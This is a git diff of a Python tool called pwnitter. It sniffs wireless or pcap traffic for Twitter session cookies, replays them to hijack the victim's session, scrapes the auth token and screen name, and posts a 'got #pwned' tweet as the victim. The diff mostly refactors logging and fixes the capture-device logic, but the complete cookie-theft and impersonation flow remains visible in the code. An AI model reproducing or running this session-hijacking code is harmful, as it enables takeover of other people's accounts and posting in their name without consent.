X-Git-Url: http://git.maemo.org/git/?p=pwnitter;a=blobdiff_plain;f=pwnitter.py;h=5a06ed24fbd0611f18cff1069dc614740743667c;hp=6995b0a76d8c201b21125162c9bc3c9971980a75;hb=d466bef674496b137abd897cb05a72b03b0e9d57;hpb=95c9e14469b6ce4dd23723e9d5d7aabf3190ca38 diff --git a/pwnitter.py b/pwnitter.py index 6995b0a..5a06ed2 100755 --- a/pwnitter.py +++ b/pwnitter.py @@ -8,11 +8,13 @@ import dbus.service import dbus.mainloop.glib import getopt, sys, pcap, dpkt, re, httplib, urllib import logging +import logging.config import socket import time import gobject import select import subprocess +import urllib2 status = 'I browsed twitter insecurely, got #pwned and all I got was this lousy tweet.' @@ -41,9 +43,11 @@ class Pwnitter(dbus.service.Object): in_signature='', out_signature='') def Start(self, filename=None): # FIXME: Prevent double Start() - device = self.device if filename is None: # Then we do *not* want to read from a PCap file but rather a monitor device self.setup_monitor(device) + device = self.device + else: # We have given a filename, so let's make PCap read from the file + device = filename self.is_running = True try: self.cap = pcap.pcap(device) @@ -81,7 +85,7 @@ class Pwnitter(dbus.service.Object): return self.status - def tear_down_monitor(device='mon0'): + def tear_down_monitor(self, device='mon0'): cmd = '/sbin/ifconfig mon0 down'.split() subprocess.call(cmd) cmd = '/usr/sbin/iw dev mon0 del'.split() @@ -98,11 +102,13 @@ class Pwnitter(dbus.service.Object): def pwn(self, device, tweeted_callback=None): + log = logging.getLogger('pwn') + processed = {} if self.is_running: # This is probably not needed, but I feel better checking it more than too less ts, raw = self.cap.next() eth = dpkt.ethernet.Ethernet(raw) - #print 'got a packet' + log.debug('got a packet') # Depending on platform, we can either get fully formed packets or unclassified radio data if isinstance(eth.data, str): data = eth.data @@ -111,26 +117,26 @@ class Pwnitter(dbus.service.Object): hostMatches = re.search('Host: ((?:api|mobile|www)?\.?twitter\.com)', data) if hostMatches: - print 'Host matched' + log.debug('Host matched') host = hostMatches.group(1) cookieMatches = re.search('Cookie: ([^\n]+)', data) + log.debug('CookieMatches? %r', cookieMatches) if cookieMatches: cookie = cookieMatches.group(1) + log.debug('yummie Cookie %r', cookie) headers = { "User-Agent": "Mozilla/5.0", "Cookie": cookie, } - conn = httplib.HTTPSConnection(host) try: - conn.request("GET", "/", None, headers) + page = urllib2.urlopen("https://%s/" % host).read() except socket.error, e: - print e + log.error(e) else: - response = conn.getresponse() - page = response.read() + log.debug('Connected to host %s', host) # Newtwitter and Oldtwitter have different formatting, so be lax authToken = '' @@ -141,6 +147,7 @@ class Pwnitter(dbus.service.Object): if authMatches: authToken = authMatches.group(1) + log.info('Found auth token %r', authToken) nameMatches = re.search('"screen_name":"(.*?)"', page, 0) if not nameMatches: @@ -149,11 +156,12 @@ class Pwnitter(dbus.service.Object): name = '' if nameMatches: name = nameMatches.group(1) + log.info('Found name %r', name) # We don't want to repeatedly spam people - # FIXME: What the fuck logic. Please clean up - if not ((not name and host != 'mobile.twitter.com') or name in processed): + # Also proceed if we didn't find a name but are on the mobile page + if not (name in processed) or ((not name) and host == 'mobile.twitter.com'): headers = { "User-Agent": "Mozilla/5.0", "Accept": "application/json, text/javascript, */*", @@ -165,7 +173,7 @@ class Pwnitter(dbus.service.Object): } - print 'Issueing connection' + log.debug('Issueing connection') if host == 'mobile.twitter.com': params = urllib.urlencode({ @@ -188,7 +196,7 @@ class Pwnitter(dbus.service.Object): response = conn.getresponse() - print 'Got response: %s' % response.status + log.debug('Got response: %s', response.status) if response.status == 200 or response.status == 302 or response.status == 403: if name: @@ -196,18 +204,17 @@ class Pwnitter(dbus.service.Object): # 403 is a dupe tweet if response.status != 403: - print "Successfully tweeted as %s" % name - print 'calling %s' % tweeted_callback + log.info("Successfully tweeted as %s", name) if tweeted_callback: tweeted_callback(name) else: - print 'Already tweeted as %s' % name + log.info('Already tweeted as %s', name) else: - print "FAILED to tweet as %s, debug follows:" % name - print response.status, response.reason - print response.read() + "\n" + log.error("FAILED to tweet as %s, debug follows:", name) + log.error("%s, %s", response.status, response.reason) + log.error("%s", response.read()) return self.is_running # Execute next time, we're idle # FIXME: Ideally, check whether Pcap has got data for us @@ -237,6 +244,7 @@ if __name__ == '__main__': 'warn': logging.WARN, 'error': logging.ERROR, 'critical': logging.CRITICAL}.get(options.loglevel, "warn") logging.basicConfig(level=loglevel) + #logging.config.fileConfig('logging.conf') #FIXME: Have file configured logging log = logging.getLogger("Main") dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) @@ -250,7 +258,7 @@ if __name__ == '__main__': #object.Start() loop = gobject.MainLoop() - print "Running example signal emitter service." + log.info("Running example signal emitter service.") # FIXME: This is debug code #gobject.idle_add(pwnitter.MessageSent)